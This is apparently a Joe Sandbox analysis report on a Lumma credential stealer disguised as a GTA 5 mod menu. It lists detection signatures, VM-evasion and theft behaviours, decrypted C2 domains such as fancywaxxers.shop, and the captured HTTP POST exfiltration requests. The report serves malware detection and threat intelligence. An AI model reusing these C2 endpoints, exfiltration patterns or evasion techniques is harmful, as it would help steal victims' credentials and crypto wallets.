Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
GTA-5-Mod-Menu-2025.exe

Overview

General Information

Sample name:GTA-5-Mod-Menu-2025.exe
Analysis ID:1582531
MD5:97098e0b103acdf642b87d2b96155992
SHA1:e6ffd40917dcb773e6cd7a9dba339cf967498c8a
SHA256:cec32b81cc4dfb722928389bea59758bfe275da7b36732512d887a845053e191
Tags:exeLummaStealeruser-aachum
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to modify clipboard data
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • GTA-5-Mod-Menu-2025.exe (PID: 5276 cmdline: "C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe" MD5: 97098E0B103ACDF642B87D2B96155992)
    • conhost.exe (PID: 5800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • GTA-5-Mod-Menu-2025.exe (PID: 64 cmdline: "C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe" MD5: 97098E0B103ACDF642B87D2B96155992)
    • GTA-5-Mod-Menu-2025.exe (PID: 6216 cmdline: "C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe" MD5: 97098E0B103ACDF642B87D2B96155992)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": "https://fancywaxxers.shop/api", "Build Version": "yau6Na--899083440"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      00000004.00000003.2202494460.0000000003593000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
        00000004.00000003.2163534118.000000000358A000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: GTA-5-Mod-Menu-2025.exe PID: 6216JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
            Process Memory Space: GTA-5-Mod-Menu-2025.exe PID: 6216JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Process Memory Space: GTA-5-Mod-Menu-2025.exe PID: 6216JoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
                Click to see the 2 entries
                No Sigma rule has matched
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-30T20:40:58.501835+010020283713Unknown Traffic192.168.2.649705104.21.96.1443TCP
                2024-12-30T20:40:59.471486+010020283713Unknown Traffic192.168.2.649706104.21.96.1443TCP
                2024-12-30T20:41:01.036591+010020283713Unknown Traffic192.168.2.649707104.21.96.1443TCP
                2024-12-30T20:41:02.335243+010020283713Unknown Traffic192.168.2.649708104.21.96.1443TCP
                2024-12-30T20:41:03.475678+010020283713Unknown Traffic192.168.2.649709104.21.96.1443TCP
                2024-12-30T20:41:05.142811+010020283713Unknown Traffic192.168.2.649710104.21.96.1443TCP
                2024-12-30T20:41:08.394830+010020283713Unknown Traffic192.168.2.649712104.21.96.1443TCP
                2024-12-30T20:41:10.624047+010020283713Unknown Traffic192.168.2.649728104.21.96.1443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-30T20:40:58.976794+010020546531A Network Trojan was detected192.168.2.649705104.21.96.1443TCP
                2024-12-30T20:41:00.222152+010020546531A Network Trojan was detected192.168.2.649706104.21.96.1443TCP
                2024-12-30T20:41:11.080134+010020546531A Network Trojan was detected192.168.2.649728104.21.96.1443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-30T20:40:58.976794+010020498361A Network Trojan was detected192.168.2.649705104.21.96.1443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-30T20:41:00.222152+010020498121A Network Trojan was detected192.168.2.649706104.21.96.1443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-30T20:41:07.345131+010020480941Malware Command and Control Activity Detected192.168.2.649710104.21.96.1443TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: https://fancywaxxers.shop/apieAvira URL Cloud: Label: malware
                Source: https://fancywaxxers.shop/apiH$0?Avira URL Cloud: Label: malware
                Source: https://fancywaxxers.shop/api9v&?Avira URL Cloud: Label: malware
                Source: https://fancywaxxers.shop/apiAvira URL Cloud: Label: malware
                Source: https://fancywaxxers.shop/Avira URL Cloud: Label: malware
                Source: https://fancywaxxers.shop/apizvAvira URL Cloud: Label: malware
                Source: https://fancywaxxers.shop:443/api_seed_dateAvira URL Cloud: Label: malware
                Source: https://fancywaxxers.shop:443/apiAvira URL Cloud: Label: malware
                Source: 00000004.00000003.2202494460.0000000003593000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: LummaC {"C2 url": "https://fancywaxxers.shop/api", "Build Version": "yau6Na--899083440"}
                Source: GTA-5-Mod-Menu-2025.exeReversingLabs: Detection: 31%
                Source: GTA-5-Mod-Menu-2025.exeJoe Sandbox ML: detected
                Source: 00000000.00000002.2097772884.0000000000D32000.00000004.00000020.00020000.00000000.sdmpString decryptor: cloudewahsj.shop
                Source: 00000000.00000002.2097772884.0000000000D32000.00000004.00000020.00020000.00000000.sdmpString decryptor: rabidcowse.shop
                Source: 00000000.00000002.2097772884.0000000000D32000.00000004.00000020.00020000.00000000.sdmpString decryptor: noisycuttej.shop
                Source: 00000000.00000002.2097772884.0000000000D32000.00000004.00000020.00020000.00000000.sdmpString decryptor: tirepublicerj.shop
                Source: 00000000.00000002.2097772884.0000000000D32000.00000004.00000020.00020000.00000000.sdmpString decryptor: framekgirus.shop
                Source: 00000000.00000002.2097772884.0000000000D32000.00000004.00000020.00020000.00000000.sdmpString decryptor: wholersorie.shop
                Source: 00000000.00000002.2097772884.0000000000D32000.00000004.00000020.00020000.00000000.sdmpString decryptor: abruptyopsn.shop
                Source: 00000000.00000002.2097772884.0000000000D32000.00000004.00000020.00020000.00000000.sdmpString decryptor: nearycrepso.shop
                Source: 00000000.00000002.2097772884.0000000000D32000.00000004.00000020.00020000.00000000.sdmpString decryptor: fancywaxxers.shop
                Source: 00000000.00000002.2097772884.0000000000D32000.00000004.00000020.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                Source: 00000000.00000002.2097772884.0000000000D32000.00000004.00000020.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
                Source: 00000000.00000002.2097772884.0000000000D32000.00000004.00000020.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
                Source: 00000000.00000002.2097772884.0000000000D32000.00000004.00000020.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
                Source: 00000000.00000002.2097772884.0000000000D32000.00000004.00000020.00020000.00000000.sdmpString decryptor: Workgroup: -
                Source: 00000000.00000002.2097772884.0000000000D32000.00000004.00000020.00020000.00000000.sdmpString decryptor: yau6Na--899083440
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4_2_004153E8 CryptUnprotectData,4_2_004153E8
                Source: GTA-5-Mod-Menu-2025.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.6:49705 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.6:49706 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.6:49707 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.6:49708 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.6:49709 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.6:49710 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.6:49712 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.6:49728 version: TLS 1.2
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 0_2_00F9B6A8 FindFirstFileExW,0_2_00F9B6A8
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 0_2_00F9B759 FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00F9B759
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 3_2_00F9B6A8 FindFirstFileExW,3_2_00F9B6A8
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 3_2_00F9B759 FindFirstFileExW,FindNextFileW,FindClose,FindClose,3_2_00F9B759
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 11A82DE9h4_2_00437960
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+0000009Ch]4_2_00422111
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+36F5144Ah]4_2_00426260
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4x nop then movzx eax, byte ptr [ecx]4_2_0043D2F7
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4x nop then movzx edi, byte ptr [ebx+eax-000000B4h]4_2_0043DBCD
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+000001ACh]4_2_00409BE0
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4x nop then movzx edx, byte ptr [esi+ecx-6C56709Dh]4_2_004153E8
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4x nop then mov ecx, eax4_2_004153E8
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4x nop then movzx esi, byte ptr [esp+ebp-39F33AEEh]4_2_0043FC30
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4x nop then mov byte ptr [esi], cl4_2_0042BE7C
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4x nop then movzx ecx, byte ptr [eax]4_2_0043CFAA
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h4_2_0042786F
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4x nop then movzx edi, byte ptr [esp+edx-27BA1B42h]4_2_0042A870
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4x nop then mov ecx, eax4_2_00414804
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-6C5670A1h]4_2_00414804
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-6C5670A1h]4_2_00414804
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4x nop then mov byte ptr [edi], bl4_2_00409010
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4x nop then mov word ptr [ecx], bp4_2_0041C8D5
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-39F33AEEh]4_2_0043F8A0
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4x nop then mov word ptr [ecx], bp4_2_0041C8BE
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4x nop then test eax, eax4_2_00438950
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4x nop then movzx eax, byte ptr [esi+edx-6C56709Dh]4_2_00418166
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4x nop then mov byte ptr [eax], cl4_2_00418166
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4x nop then cmp dword ptr [ecx+edx*8], EACC7C31h4_2_00418166
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4x nop then mov edx, dword ptr [esi+5Ch]4_2_00416913
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4x nop then movzx edx, byte ptr [ebp+00h]4_2_004029E0
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4x nop then mov byte ptr [ebp+00h], al4_2_0041D9B0
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4x nop then movzx edx, byte ptr [esp+esi-1700508Ah]4_2_004219B0
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+02h]4_2_004219B0
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4x nop then mov word ptr [eax], cx4_2_004219B0
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+7D4B075Fh]4_2_0040C252
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4x nop then movzx ebx, word ptr [ecx]4_2_00424A08
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4x nop then mov byte ptr [ebx], cl4_2_0041BA29
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4x nop then mov byte ptr [ebx], al4_2_0041B22A
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4x nop then movzx edx, byte ptr [ecx]4_2_0041B22A
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h4_2_004292F3
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4x nop then cmp word ptr [ebp+ecx+00h], 0000h4_2_00414280
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx-6C5670A1h]4_2_00414280
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4x nop then mov edx, dword ptr [ebp-30h]4_2_00428BF0
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4x nop then movzx edi, byte ptr [eax]4_2_0043BB80
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4x nop then movzx edi, byte ptr [edx]4_2_0043BB80
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+18h]4_2_0043BB80
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 11A82DE9h4_2_00419440
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 385488F2h4_2_00419440
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h4_2_00427449
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h4_2_00427472
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4x nop then mov ecx, eax4_2_0040CC10
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]4_2_00407430
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]4_2_00407430
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4x nop then mov byte ptr [ebx], cl4_2_0041ACDA
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx-0ECAA1D9h]4_2_0041BCF0
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4x nop then mov word ptr [eax], cx4_2_0041BCF0
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4x nop then mov ecx, dword ptr [ebp-10h]4_2_00423C80
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4x nop then mov ecx, eax4_2_0041B497
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4x nop then mov byte ptr [ebx], al4_2_0041B497
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4x nop then mov edi, eax4_2_0041B5B9
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]4_2_00429E60
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4x nop then mov edi, eax4_2_00428630
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4x nop then movzx edi, byte ptr [ebp+ecx-3107E08Dh]4_2_00428630
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4x nop then mov word ptr [esi], ax4_2_00409690
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4x nop then jmp eax4_2_00438690
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4x nop then movzx ebx, byte ptr [edx]4_2_00434E90
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4x nop then mov dword ptr [esp+00000100h], DAB1AE6Fh4_2_0042AF4D
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4x nop then jmp eax4_2_0040A706
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4x nop then jmp eax4_2_0040A4B5
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4x nop then movzx edx, byte ptr [eax+edi-4DF122A2h]4_2_00428F1F
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h4_2_00414F27
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4x nop then push eax4_2_00427F32
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+0000027Ch]4_2_0042CF3F
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4x nop then mov byte ptr [eax], cl4_2_0041A7C6
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4x nop then mov ecx, eax4_2_0042AFEA
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeCode function: 4x nop then cmp dword ptr [esi+ebx*8], 385488F2h4_2_0040DF82

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49705 -> 104.21.96.1:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49705 -> 104.21.96.1:443
                Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:49710 -> 104.21.96.1:443
                Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:49706 -> 104.21.96.1:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49706 -> 104.21.96.1:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49728 -> 104.21.96.1:443
                Source: Malware configuration extractorURLs: https://fancywaxxers.shop/api
                Source: Joe Sandbox ViewIP Address: 104.21.96.1 104.21.96.1
                Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49706 -> 104.21.96.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49705 -> 104.21.96.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49712 -> 104.21.96.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49709 -> 104.21.96.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49710 -> 104.21.96.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49707 -> 104.21.96.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49708 -> 104.21.96.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49728 -> 104.21.96.1:443
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: fancywaxxers.shop
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 51Host: fancywaxxers.shop
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=2PP8C865FU3User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12821Host: fancywaxxers.shop
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=E4S8N39OUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15049Host: fancywaxxers.shop
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=WAQFEYZ2User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 19907Host: fancywaxxers.shop
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=L7D6IRQA4TEVUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1220Host: fancywaxxers.shop
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=95Z0Z9TD6C7TMHMMUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 572287Host: fancywaxxers.shop
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 86Host: fancywaxxers.shop
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficDNS traffic detected: DNS query: fancywaxxers.shop
                Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: fancywaxxers.shop
                Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2147289570.0000000005CCA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2147289570.0000000005CCA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2147289570.0000000005CCA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2147289570.0000000005CCA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2147289570.0000000005CCA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2147289570.0000000005CCA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2147289570.0000000005CCA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2147289570.0000000005CCA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2147289570.0000000005CCA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2147289570.0000000005CCA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                Source: GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2147289570.0000000005CCA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
